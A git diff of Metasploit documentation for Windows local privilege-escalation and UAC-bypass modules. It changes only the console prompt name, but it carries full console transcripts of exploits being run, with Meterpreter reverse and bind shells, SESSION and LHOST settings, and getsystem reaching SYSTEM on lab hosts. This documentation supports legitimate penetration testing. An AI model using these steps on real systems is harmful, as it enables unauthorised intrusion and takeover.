@@ -27,12 +27,12 @@ Affected Windows OS versions and related patch details can be found in the [Micr ### Tested on Windows 10 Pro Version 1803 x64 ``` -msf5 > use exploit/windows/local/alpc_taskscheduler -msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp +msf > use exploit/windows/local/alpc_taskscheduler +msf exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 +msf exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 lhost => 172.22.222.136 -msf5 exploit(windows/local/alpc_taskscheduler) > sessions +msf exploit(windows/local/alpc_taskscheduler) > sessions Active sessions =============== @@ -42,17 +42,17 @@ Active sessions 1 shell x64/windows Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al... 172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200) 2 meterpreter x64/windows DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR 172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200) -msf5 exploit(windows/local/alpc_taskscheduler) > set session 1 +msf exploit(windows/local/alpc_taskscheduler) > set session 1 session => 1 -msf5 exploit(windows/local/alpc_taskscheduler) > exploit +msf exploit(windows/local/alpc_taskscheduler) > exploit [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.22.222.136:4444 [-] Exploit aborted due to failure: none: Only meterpreter sessions are supported [*] Exploit completed, but no session was created. -msf5 exploit(windows/local/alpc_taskscheduler) > set session 2 +msf exploit(windows/local/alpc_taskscheduler) > set session 2 session => 2 -msf5 exploit(windows/local/alpc_taskscheduler) > exploit +msf exploit(windows/local/alpc_taskscheduler) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Checking target... 
@@ -76,13 +76,13 @@ Logged On Users : 3 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 3... -msf5 exploit(windows/local/alpc_taskscheduler) > set session 3 +msf exploit(windows/local/alpc_taskscheduler) > set session 3 session => 3 -msf5 exploit(windows/local/alpc_taskscheduler) > exploit +msf exploit(windows/local/alpc_taskscheduler) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Checking target... [-] Exploit aborted due to failure: none: Session is already elevated [*] Exploit completed, but no session was created. -msf5 exploit(windows/local/alpc_taskscheduler) > +msf exploit(windows/local/alpc_taskscheduler) > ``` diff --git a/documentation/modules/exploit/windows/local/anyconnect_lpe.md b/documentation/modules/exploit/windows/local/anyconnect_lpe.md index 7e0c841ec0..360b190ab2 100644 --- a/documentation/modules/exploit/windows/local/anyconnect_lpe.md +++ b/documentation/modules/exploit/windows/local/anyconnect_lpe.md 
@@ -73,24 +73,24 @@ been provided. ### Windows 10 version 1909 (x64) with AnyConnect 4.8.3052 - CVE-2020-3433 ``` -msf5 exploit(windows/local/anyconnect_lpe) > set SESSION 1 +msf exploit(windows/local/anyconnect_lpe) > set SESSION 1 SESSION => 1 -msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 +msf exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 lhost => 192.168.1.24 -msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445 +msf exploit(windows/local/anyconnect_lpe) > set lport 4445 lport => 4445 -msf5 exploit(windows/local/anyconnect_lpe) > set verbose true +msf exploit(windows/local/anyconnect_lpe) > set verbose true verbose => true -msf5 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433 +msf exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433 CVE => CVE-2020-3433 -msf5 exploit(windows/local/anyconnect_lpe) > check +msf exploit(windows/local/anyconnect_lpe) > check [*] Try to detect installation path... [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe' [*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433). -msf5 exploit(windows/local/anyconnect_lpe) > run +msf exploit(windows/local/anyconnect_lpe) > run [*] Started reverse TCP handler on 192.168.1.24:4445 [*] Try to detect installation path... 
@@ -124,24 +124,24 @@ Meterpreter : x86/windows ### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3153 ``` -msf5 exploit(windows/local/anyconnect_lpe) > set session 4 +msf exploit(windows/local/anyconnect_lpe) > set session 4 session => 4 -msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 +msf exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 lhost => 192.168.1.24 -msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445 +msf exploit(windows/local/anyconnect_lpe) > set lport 4445 lport => 4445 -msf5 exploit(windows/local/anyconnect_lpe) > set verbose true +msf exploit(windows/local/anyconnect_lpe) > set verbose true verbose => true -msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3153 +msf exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3153 cve => CVE-2020-3153 -msf5 exploit(windows/local/anyconnect_lpe) > check +msf exploit(windows/local/anyconnect_lpe) > check [*] Try to detect installation path... [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe' [*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433). -msf5 exploit(windows/local/anyconnect_lpe) > run +msf exploit(windows/local/anyconnect_lpe) > run [*] Started reverse TCP handler on 192.168.1.24:4445 [*] Try to detect installation path... 
@@ -173,24 +173,24 @@ Meterpreter : x86/windows ### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3433 ``` -msf5 exploit(windows/local/anyconnect_lpe) > set session 4 +msf exploit(windows/local/anyconnect_lpe) > set session 4 session => 4 -msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 +msf exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24 lhost => 192.168.1.24 -msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445 +msf exploit(windows/local/anyconnect_lpe) > set lport 4445 lport => 4445 -msf5 exploit(windows/local/anyconnect_lpe) > set verbose true +msf exploit(windows/local/anyconnect_lpe) > set verbose true verbose => true -msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3433 +msf exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3433 cve => CVE-2020-3433 -msf5 exploit(windows/local/anyconnect_lpe) > check +msf exploit(windows/local/anyconnect_lpe) > check [*] Try to detect installation path... [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe' [*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433). -msf5 exploit(windows/local/anyconnect_lpe) > run +msf exploit(windows/local/anyconnect_lpe) > run [*] Started reverse TCP handler on 192.168.1.24:4445 [*] Try to detect installation path... diff --git a/documentation/modules/exploit/windows/local/appxsvc_hard_link_privesc.md b/documentation/modules/exploit/windows/local/appxsvc_hard_link_privesc.md index 7843178450..328652942d 100644 --- a/documentation/modules/exploit/windows/local/appxsvc_hard_link_privesc.md +++ b/documentation/modules/exploit/windows/local/appxsvc_hard_link_privesc.md 
@@ -27,12 +27,12 @@ ### Tested on Windows 10 Version 1709 Build 16299.125 ``` - msf5 > use multi/handler - msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp + msf > use multi/handler + msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (206403 bytes) to 192.168.37.135 @@ -42,14 +42,14 @@ Server username: DESKTOP-L5FDSM7\Shelby Pace meterpreter > background [*] Backgrounding session 1... - msf5 exploit(multi/handler) > use exploit/windows/local/appxsvc_hard_link_privesc - msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set session 1 + msf exploit(multi/handler) > use exploit/windows/local/appxsvc_hard_link_privesc + msf exploit(windows/local/appxsvc_hard_link_privesc) > set session 1 session => 1 - msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/x64/meterpreter/reverse_tcp + msf exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set lhost 192.168.37.1 + msf exploit(windows/local/appxsvc_hard_link_privesc) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/local/appxsvc_hard_link_privesc) > run + msf exploit(windows/local/appxsvc_hard_link_privesc) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 192.168.37.1:4444 diff --git a/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md b/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md index 70b8abca76..20c29f401f 100644 
--- a/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md +++ b/documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md @@ -23,7 +23,7 @@ process, but others would work, too. ### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64 ``` -msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run +msf exploit(windows/local/bypassuac_dotnet_profiler) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] UAC is Enabled, checking level... @@ -76,10 +76,10 @@ meterpreter > ### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64 ``` -msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler -msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 6 +msf exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler +msf exploit(windows/local/bypassuac_dotnet_profiler) > set session 6 session => 6 -msf5 exploit(windows/local/bypassuac_dotnet_profiler) > show options +msf exploit(windows/local/bypassuac_dotnet_profiler) > show options Module options (exploit/windows/local/bypassuac_dotnet_profiler): @@ -105,7 +105,7 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run +msf exploit(windows/local/bypassuac_dotnet_profiler) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] UAC is Enabled, checking level... diff --git a/documentation/modules/exploit/windows/local/bypassuac_sdclt.md b/documentation/modules/exploit/windows/local/bypassuac_sdclt.md index df3258986b..40c106e169 100644 --- a/documentation/modules/exploit/windows/local/bypassuac_sdclt.md +++ b/documentation/modules/exploit/windows/local/bypassuac_sdclt.md @@ -18,7 +18,7 @@ system's sdclt.exe binary to run as a higher integrity process. ### Windows 10.0.17134 x64 ``` -msf5 exploit(windows/local/bypassuac_sdclt) > show options +msf exploit(windows/local/bypassuac_sdclt) > show options Module options (exploit/windows/local/bypassuac_sdclt): 
@@ -44,7 +44,7 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/bypassuac_sdclt) > run +msf exploit(windows/local/bypassuac_sdclt) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] UAC is Enabled, checking level... diff --git a/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md b/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md index 840d45dd81..2b51414233 100644 --- a/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md +++ b/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md @@ -20,7 +20,7 @@ be saved in a script file somewhere, it cannot be run directly from powershell o ## Scenarios ``` -msf5 > sessions +msf > sessions Active sessions =============== @@ -29,14 +29,14 @@ Active sessions -- ---- ---- ----------- ---------- 6 meterpreter x86/windows DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP 192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x) -msf5 > use exploit/windows/local/bypassuac_silentcleanup -msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6 +msf > use exploit/windows/local/bypassuac_silentcleanup +msf exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6 SESSION => 6 -msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx +msf exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx LHOST => 192.168.1.xx -msf5 exploit(windows/local/bypassuac_silentcleanup) > options +msf exploit(windows/local/bypassuac_silentcleanup) > options Module options (exploit/windows/local/bypassuac_silentcleanup): 
@@ -62,7 +62,7 @@ Exploit target: 0 Microsoft Windows -msf5 exploit(windows/local/bypassuac_silentcleanup) > run +msf exploit(windows/local/bypassuac_silentcleanup) > run [*] Started reverse TCP handler on 192.168.1.xx:4444 [+] Part of Administrators group! Continuing... @@ -73,5 +73,5 @@ meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > bg [*] Backgrounding session 10... -msf5 exploit(windows/local/bypassuac_silentcleanup) > +msf exploit(windows/local/bypassuac_silentcleanup) > ``` diff --git a/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md b/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md index 4b969600e3..595b0d8dab 100644 --- a/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md +++ b/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md @@ -22,7 +22,7 @@ privileges. ### Windows 10.0.17134.885 x64 ``` -msf5 exploit(windows/local/bypassuac_windows_store_reg) > run +msf exploit(windows/local/bypassuac_windows_store_reg) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] UAC is Enabled, checking level... diff --git a/documentation/modules/exploit/windows/local/comahawk.md b/documentation/modules/exploit/windows/local/comahawk.md index 1f12fb79de..3f1336bf9d 100644 --- a/documentation/modules/exploit/windows/local/comahawk.md +++ b/documentation/modules/exploit/windows/local/comahawk.md 
@@ -46,16 +46,16 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/comahawk -msf5 exploit(windows/local/comahawk) > set versbose true +msf exploit(multi/handler) > use exploit/windows/local/comahawk +msf exploit(windows/local/comahawk) > set versbose true versbose => true -msf5 exploit(windows/local/comahawk) > set session 1 +msf exploit(windows/local/comahawk) > set session 1 session => 1 -msf5 exploit(windows/local/comahawk) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/comahawk) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/comahawk) > set lhost 192.168.135.168 +msf exploit(windows/local/comahawk) > set lhost 192.168.135.168 lhost => 192.168.135.168 -msf5 exploit(windows/local/comahawk) > show options +msf exploit(windows/local/comahawk) > show options Module options (exploit/windows/local/comahawk): @@ -85,7 +85,7 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/comahawk) > run +msf exploit(windows/local/comahawk) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1 diff --git a/documentation/modules/exploit/windows/local/cve_2018_8453_win32k_priv_esc.md b/documentation/modules/exploit/windows/local/cve_2018_8453_win32k_priv_esc.md index 7929655d54..18cf6c596b 100644 --- a/documentation/modules/exploit/windows/local/cve_2018_8453_win32k_priv_esc.md +++ b/documentation/modules/exploit/windows/local/cve_2018_8453_win32k_priv_esc.md @@ -17,7 +17,7 @@ This module has been tested with Windows 10 v1703 x86. Offsets within the soluti ### Windows 10 v1703 x86 ``` -msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > sessions +msf exploit(windows/local/cve_2018_8453_win32k_priv_esc) > sessions Active sessions =============== 
@@ -26,9 +26,9 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter x86/windows DESKTOP-T6J3V2L\testuser @ DESKTOP-T6J3V2L 172.22.222.136:4444 -> 172.22.222.130:49693 (172.22.222.130) -msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > set session 1 +msf exploit(windows/local/cve_2018_8453_win32k_priv_esc) > set session 1 session => 1 -msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > exploit +msf exploit(windows/local/cve_2018_8453_win32k_priv_esc) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [+] Exploit finished, wait for privileged payload execution to complete. @@ -49,5 +49,5 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 172.22.222.130 - Meterpreter session 2 closed. Reason: User exit -msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > +msf exploit(windows/local/cve_2018_8453_win32k_priv_esc) > ``` diff --git a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md index 751dba8bab..5801b0ced4 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md 
@@ -124,16 +124,16 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0668_service_tracing -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(multi/handler) > use exploit/windows/local/cve_2020_0668_service_tracing +msf exploit(windows/local/cve_2020_0668_service_tracing) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set lhost 192.168.135.168 +msf exploit(windows/local/cve_2020_0668_service_tracing) > set lhost 192.168.135.168 lhost => 192.168.135.168 -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set verbose true +msf exploit(windows/local/cve_2020_0668_service_tracing) > set verbose true verbose => true -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set session 1 +msf exploit(windows/local/cve_2020_0668_service_tracing) > set session 1 session => 1 -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > show options +msf exploit(windows/local/cve_2020_0668_service_tracing) > show options Module options (exploit/windows/local/cve_2020_0668_service_tracing): @@ -162,7 +162,7 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > run +msf exploit(windows/local/cve_2020_0668_service_tracing) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Build Number = 17134 diff --git a/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md b/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md index e35dc374d0..51631ddbaa 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md 
@@ -54,7 +54,7 @@ vulnerability. ### Windows 10 v1909 x64 - Build 18363.418 ``` -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started bind TCP handler against 172.26.22.128:4444 [*] Sending stage (201283 bytes) to 172.26.22.128 @@ -77,8 +77,8 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 2... -msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options +msf exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move): @@ -105,9 +105,9 @@ Exploit target: 0 Windows DLL Dropper -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/x64/meterpreter/bind_tcp +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/x64/meterpreter/bind_tcp PAYLOAD => windows/x64/meterpreter/bind_tcp -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move): 
@@ -134,11 +134,11 @@ Exploit target: 0 Windows DLL Dropper -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.22.128 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.22.128 RHOST => 172.26.22.128 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 9988 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 9988 LPORT => 9988 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move): @@ -165,11 +165,11 @@ Exploit target: 0 Windows DLL Dropper -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSIOn 2 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSIOn 2 SESSIOn => 2 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 40 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 40 JOB_WAIT_TIME => 40 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit [*] Step #1: Checking target environment... [*] Step #2: Generating the malicious DLL... @@ -220,7 +220,7 @@ meterpreter > ### Windows 10 v1903 x86 - Build 18362.30 ``` -msf5 exploit(multi/handler) > show options +msf exploit(multi/handler) > show options Module options (exploit/multi/handler): @@ -244,7 +244,7 @@ Exploit target: 0 Wildcard Target -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started bind TCP handler against 172.26.17.231:4444 [*] Sending stage (176195 bytes) to 172.26.17.231 
@@ -267,12 +267,12 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 4... -msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSION 4 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSION 4 SESSION => 4 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move): @@ -299,13 +299,13 @@ Exploit target: 0 Windows DLL Dropper -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.17.231 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.17.231 RHOST => 172.26.17.231 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 8822 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 8822 LPORT => 8822 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 30 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 30 JOB_WAIT_TIME => 30 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit [*] Step #1: Checking target environment... [*] Step #2: Generating the malicious DLL... 
diff --git a/documentation/modules/exploit/windows/local/cve_2020_0796_smbghost.md b/documentation/modules/exploit/windows/local/cve_2020_0796_smbghost.md index 45652d5614..01970bd5f5 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0796_smbghost.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0796_smbghost.md @@ -34,7 +34,7 @@ box. The default setting is to have SMBv3 compression enabled. ### Windows 10 Version 1909 Build 18363.418 x64 ``` -msf5 exploit(windows/local/cve_2020_0796_smbghost) > sessions -i -1 +msf exploit(windows/local/cve_2020_0796_smbghost) > sessions -i -1 [*] Starting interaction with 1... meterpreter > getuid @@ -54,7 +54,7 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 1... -msf5 exploit(windows/local/cve_2020_0796_smbghost) > show options +msf exploit(windows/local/cve_2020_0796_smbghost) > show options Module options (exploit/windows/local/cve_2020_0796_smbghost): @@ -79,7 +79,7 @@ Exploit target: 0 Windows 10 v1903-1909 x64 -msf5 exploit(windows/local/cve_2020_0796_smbghost) > exploit +msf exploit(windows/local/cve_2020_0796_smbghost) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Executing automatic check (disable AutoCheck to override) @@ -94,4 +94,4 @@ Server username: NT AUTHORITY\SYSTEM meterpreter > ``` -[1]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005 \ No newline at end of file +[1]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005 diff --git a/documentation/modules/exploit/windows/local/docker_credential_wincred.md b/documentation/modules/exploit/windows/local/docker_credential_wincred.md index 61e248b673..2ca4070ef7 100644 --- a/documentation/modules/exploit/windows/local/docker_credential_wincred.md +++ b/documentation/modules/exploit/windows/local/docker_credential_wincred.md 
@@ -19,7 +19,7 @@ ### Tested on Docker Community Edition 2.0.0.0 running on Windows 10x64 Release 1803 ``` -msf5 exploit(windows/local/docker_credential_wincred) > show options +msf exploit(windows/local/docker_credential_wincred) > show options Module options (exploit/windows/local/docker_credential_wincred): @@ -36,13 +36,13 @@ Exploit target: 0 Automatic -msf5 exploit(windows/local/docker_credential_wincred) > set session 1 +msf exploit(windows/local/docker_credential_wincred) > set session 1 session => 1 -msf5 exploit(windows/local/docker_credential_wincred) > check +msf exploit(windows/local/docker_credential_wincred) > check [*] Docker version 18.09.0, build 4d60db4 [*] The target appears to be vulnerable. -msf5 exploit(windows/local/docker_credential_wincred) > run +msf exploit(windows/local/docker_credential_wincred) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Docker version 18.09.0, build 4d60db4 diff --git a/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md b/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md index 1e0944547d..6e18362aad 100644 --- a/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md +++ b/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md @@ -24,12 +24,12 @@ The initial working directory of the command. ### GOG Galaxy Client `v1.2.66.64` on Windows 10 ``` -msf5 > use multi/handler -msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp +msf > use multi/handler +msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set lhost 192.168.37.1 +msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (201283 bytes) to 192.168.37.131 
@@ -47,16 +47,16 @@ Logged On Users : 15 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1 +msf exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc +msf exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1 session => 1 -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1 +msf exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1 lhost => 192.168.37.1 -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check +msf exploit(windows/local/gog_galaxyclientservice_privesc) > check [*] The target appears to be 